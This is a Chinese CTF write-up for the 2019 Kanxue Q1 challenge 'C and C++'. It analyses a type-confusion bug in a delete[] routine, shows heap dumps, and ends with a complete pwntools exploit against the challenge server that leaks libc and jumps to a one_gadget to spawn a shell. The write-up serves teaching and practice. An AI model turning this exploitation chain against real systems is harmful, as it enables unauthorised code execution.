2019看雪CTFQ1 C与C++

2024-01-15 17:48
文章标签 c++ 2019 看雪 ctfq1

本文主要是介绍2019看雪CTFQ1 C与C++,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

 漏洞类型

应该算个类型混淆吧

保护机制

[*] '~/candcpp'Arch:     amd64-64-littleRELRO:    Partial RELROStack:    Canary foundNX:       NX enabledPIE:      No PIE (0x400000)FORTIFY:  Enabled

漏洞分析

v1 = (void (***)())ptr[a1];            //heap的mem指针if ( v1 ){v2 = &v1[3 * (_QWORD)*(v1 - 1)];    //v1-1是heap的size,v2=heap+8*3*size_of_heapwhile ( v2 != v1 ){while ( 1 ){v2 -= 3;                        //&v2-=0x18v3 = **v2;                       //取两层引用if ( v3 == nullsub_1 )break;((void (__fastcall *)(void (***)()))v3)(v2);//调用v3v1 = (void (***)())ptr[a1];if ( v2 == v1 )goto LABEL_6;}}
LABEL_6:operator delete[](v2 - 1);}ptr[a1] = 0LL;

 c++的delete功能中,没有检测是不是有c++的new分配的空间。理论上,可以根据size的大小,去分配相应大小的堆以控制对应v2的内容,从而能够控制v3函数指针,达到控制程序流的目的。

比如以下,我将size控制到最小——0x21,这样的话实际上我需要控制heap+3*8*0x21之前的部分内存,以方便在v2-=3的时候,能生成调用流heap+3*8*0x21-3*8->heap+3*8*0x21-3*8-3*8......

#建个0x20的堆
ru('>> ')
sl(1)
sl(0)
#建个比较大的堆
malloc(0x1d3,'A'*(0x1cb-0x10)+p64(name+8)+'B'*7+p64(name))#对应的堆的调试信息
#heap
0x2239e60 FASTBIN {mchunk_prev_size = 0, mchunk_size = 33,    #0x21 fd = 0x0, bk = 0x0, fd_nextsize = 0x0, bk_nextsize = 0x311
}
0x2239e80 PREV_INUSE {mchunk_prev_size = 0, mchunk_size = 785,     #0x311fd = 0x0, bk = 0x4141414141414141, fd_nextsize = 0x41414141414141, bk_nextsize = 0x0
}
#####################
pwndbg> x/120gx 0x2239e60
0x2239e60:	0x0000000000000000	0x0000000000000021    #chunk0
0x2239e70:	0x0000000000000000	0x0000000000000000
0x2239e80:	0x0000000000000000	0x0000000000000311    #chunk1
0x2239e90:	0x0000000000000000	0x4141414141414141
0x2239ea0:	0x0041414141414141	0x0000000000000000
0x2239eb0:	0x4141414141414141	0x0041414141414141
0x2239ec0:	0x0000000000000000	0x4141414141414141
0x2239ed0:	0x0041414141414141	0x0000000000000000
0x2239ee0:	0x4141414141414141	0x0041414141414141
...             struct{
...             QWORD* vtable;    //malloc 方式保存为0
...             15字节的data+'\x00'    //16字节
...             }
0x223a130:	0x0000000000000000	0x4141414141414141
0x223a140:	0x0041414141414141	0x0000000000000000
0x223a150:	0x4141414141414141	0x0000000000602330     #0x2239e70+0x21*3*8-3*8-3*8=0x223a158
0x223a160:	0x0000000000000000	0x4242424242424200
0x223a170:	0x0000000000602328	0x0000000000000000    #0x2239e70+0x21*3*8-3*8=0x223a188-3*8 = 0x223a170
0x223a180:	0x0000000000000000	0x0000000000000000
0x223a190:	0x0000000000000000	0x000000000000ee71    #top chunk

由堆的调试的信息看出我们输入的信息是分块保存,每块前8个字节是0,接着15字节保存数据,最后一个字节截断为'\x00'。

__int64 sub_400E10()
{signed __int64 v1; // [rsp-8h] [rbp-8h]v1 = '\np%';return __printf_chk(0LL, (__int64)&v1);    //格式化字符串,printf("%p\n");
}

 通过menu菜单里一个隐蔽的函数,可以泄露puts地址。

利用思路

根据以上分析,我在内存中选择一块可控区域,放入0x400e10函数指针,泄露libc。然后控制堆上的内容,返回main函数利用libc调用one_gadget。

1、在一开始输入name的时候可以输入16字节的内容,这里就输入两个函数,0x400e10和main

2、泄露puts地址返回main后,再次写入name为one_gadget,重新触发调用name的函数指针,getshell

EXP

from PwnContext import *#try:
#    from IPython import embed as ipy
#except ImportError:
#    print ('IPython not installed.')# context.terminal = ['tmux', 'splitw', '-h'] # uncomment this if you use tmux
#context.log_level = 'debug'
# functions for quick script
s       = lambda data               :ctx.send(str(data))        #in case that data is an int
sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data)) 
st      = lambda delim,data         :ctx.sendthen(str(delim), str(data)) 
sl      = lambda data               :ctx.sendline(str(data)) 
sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data)) 
slt     = lambda delim,data         :ctx.sendlinethen(str(delim), str(data)) 
r       = lambda numb=4096          :ctx.recv(numb)
ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
irt     = lambda                    :ctx.interactive()
rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
leak    = lambda address, count=0   :ctx.leak(address, count)
dbg     = lambda *args, **kwargs    :ctx.debug(*args, **kwargs)
# misc functions
uu32    = lambda data   :u32(data.ljust(4, '\0'))
uu64    = lambda data   :u64(data.ljust(8, '\0'))#ctx.binary = './candcpp'
#ctx.breakpoints = [0x400a62,0x400dae]#after malloc
ctx.remote_libc = './libc-2.23.so'
ctx.remote = ('154.8.222.144', 9999)
ctx.debug_remote_libc = False# True for debugging remote libc, false for local.
#rs()rs('remote') # uncomment this for exploiting remote target
libc = ctx.libc # ELF object of the corresponding libc.
# ipy() # if you have ipython, you can use this to check variables.
def malloc(length,string):ru(">> ")sl(1)sl(length)sl(string)
def delete(index):ru(">> ")sl(4)sl(index)
#leak libc
puts = 0x400e10
main = 0x4009a0
name = 0x602328
sl(p64(puts)+p64(main))ru('>> ')
sl(1)
sl(0)
malloc(0x1d3,'A'*(0x1cb-0x10)+p64(name+8)+'B'*7+p64(name))
#dbg()
delete(0)
ru('Please input index of the string\n')
libc_base = int(r(14),16)
success('leak addr: {}'.format(hex(libc_base)))
libc_base -=libc.symbols['puts']
success('leak libc: {}'.format(hex(libc_base)))#write ones
#dbg()
print one_gadgets('libc-2.23.so')
'''
0x4f2c5 execve("/bin/sh", rsp+0x40, environ)
constraints:rcx == NULL0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:[rsp+0x40] == NULL0x10a38c execve("/bin/sh", rsp+0x70, environ)
constraints:[rsp+0x70] == NULLremote
[283158, 283242, 983716, 987463]
'''
one=983716+libc_base
sl(p64(one))
delete(0)
irt()

 这里不得不吐槽依稀CSDN的上传图片的功能,不能直接复制粘贴,还得先保存图片后上传到服务器,才能用。。

这篇关于2019看雪CTFQ1 C与C++的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/609711

相关文章

Python获取C++中返回的char*字段的两种思路

Python获取C++中返回的char*字段的两种思路

《Python获取C++中返回的char*字段的两种思路》有时候需要获取C++函数中返回来的不定长的char*字符串,本文小编为大家找到了两种解决问题的思路,感兴趣的小伙伴可以跟随小编一起学习一下... 有时候需要获取C++函数中返回来的不定长的char*字符串,目前我找到两种解决问题的思路,具体实现如下:
阅读更多...
C++ Sort函数使用场景分析

C++ Sort函数使用场景分析

《C++Sort函数使用场景分析》sort函数是algorithm库下的一个函数,sort函数是不稳定的,即大小相同的元素在排序后相对顺序可能发生改变,如果某些场景需要保持相同元素间的相对顺序,可使... 目录C++ Sort函数详解一、sort函数调用的两种方式二、sort函数使用场景三、sort函数排序
阅读更多...
Java调用C++动态库超详细步骤讲解(附源码)

Java调用C++动态库超详细步骤讲解(附源码)

《Java调用C++动态库超详细步骤讲解(附源码)》C语言因其高效和接近硬件的特性,时常会被用在性能要求较高或者需要直接操作硬件的场合,:本文主要介绍Java调用C++动态库的相关资料,文中通过代... 目录一、直接调用C++库第一步:动态库生成(vs2017+qt5.12.10)第二步:Java调用C++
阅读更多...
C/C++错误信息处理的常见方法及函数

C/C++错误信息处理的常见方法及函数

《C/C++错误信息处理的常见方法及函数》C/C++是两种广泛使用的编程语言,特别是在系统编程、嵌入式开发以及高性能计算领域,:本文主要介绍C/C++错误信息处理的常见方法及函数,文中通过代码介绍... 目录前言1. errno 和 perror()示例:2. strerror()示例:3. perror(
阅读更多...
C++变换迭代器使用方法小结

C++变换迭代器使用方法小结

《C++变换迭代器使用方法小结》本文主要介绍了C++变换迭代器使用方法小结,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧... 目录1、源码2、代码解析代码解析:transform_iterator1. transform_iterat
阅读更多...
详解C++中类的大小决定因数

详解C++中类的大小决定因数

《详解C++中类的大小决定因数》类的大小受多个因素影响,主要包括成员变量、对齐方式、继承关系、虚函数表等,下面就来介绍一下,具有一定的参考价值,感兴趣的可以了解一下... 目录1. 非静态数据成员示例:2. 数据对齐(Padding)示例:3. 虚函数(vtable 指针)示例:4. 继承普通继承虚继承5.
阅读更多...
C++中std::distance使用方法示例

C++中std::distance使用方法示例

《C++中std::distance使用方法示例》std::distance是C++标准库中的一个函数,用于计算两个迭代器之间的距离,本文主要介绍了C++中std::distance使用方法示例,具... 目录语法使用方式解释示例输出:其他说明:总结std::distance&n编程bsp;是 C++ 标准
阅读更多...
C++ 中的 if-constexpr语法和作用

C++ 中的 if-constexpr语法和作用

《C++中的if-constexpr语法和作用》if-constexpr语法是C++17引入的新语法特性,也被称为常量if表达式或静态if(staticif),:本文主要介绍C++中的if-c... 目录1 if-constexpr 语法1.1 基本语法1.2 扩展说明1.2.1 条件表达式1.2.2 fa
阅读更多...
C++中::SHCreateDirectoryEx函数使用方法

C++中::SHCreateDirectoryEx函数使用方法

《C++中::SHCreateDirectoryEx函数使用方法》::SHCreateDirectoryEx用于创建多级目录,类似于mkdir-p命令,本文主要介绍了C++中::SHCreateDir... 目录1. 函数原型与依赖项2. 基本使用示例示例 1:创建单层目录示例 2:创建多级目录3. 关键注
阅读更多...
C++从序列容器中删除元素的四种方法

C++从序列容器中删除元素的四种方法

《C++从序列容器中删除元素的四种方法》删除元素的方法在序列容器和关联容器之间是非常不同的,在序列容器中,vector和string是最常用的,但这里也会介绍deque和list以供全面了解,尽管在一... 目录一、简介二、移除给定位置的元素三、移除与某个值相等的元素3.1、序列容器vector、deque
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2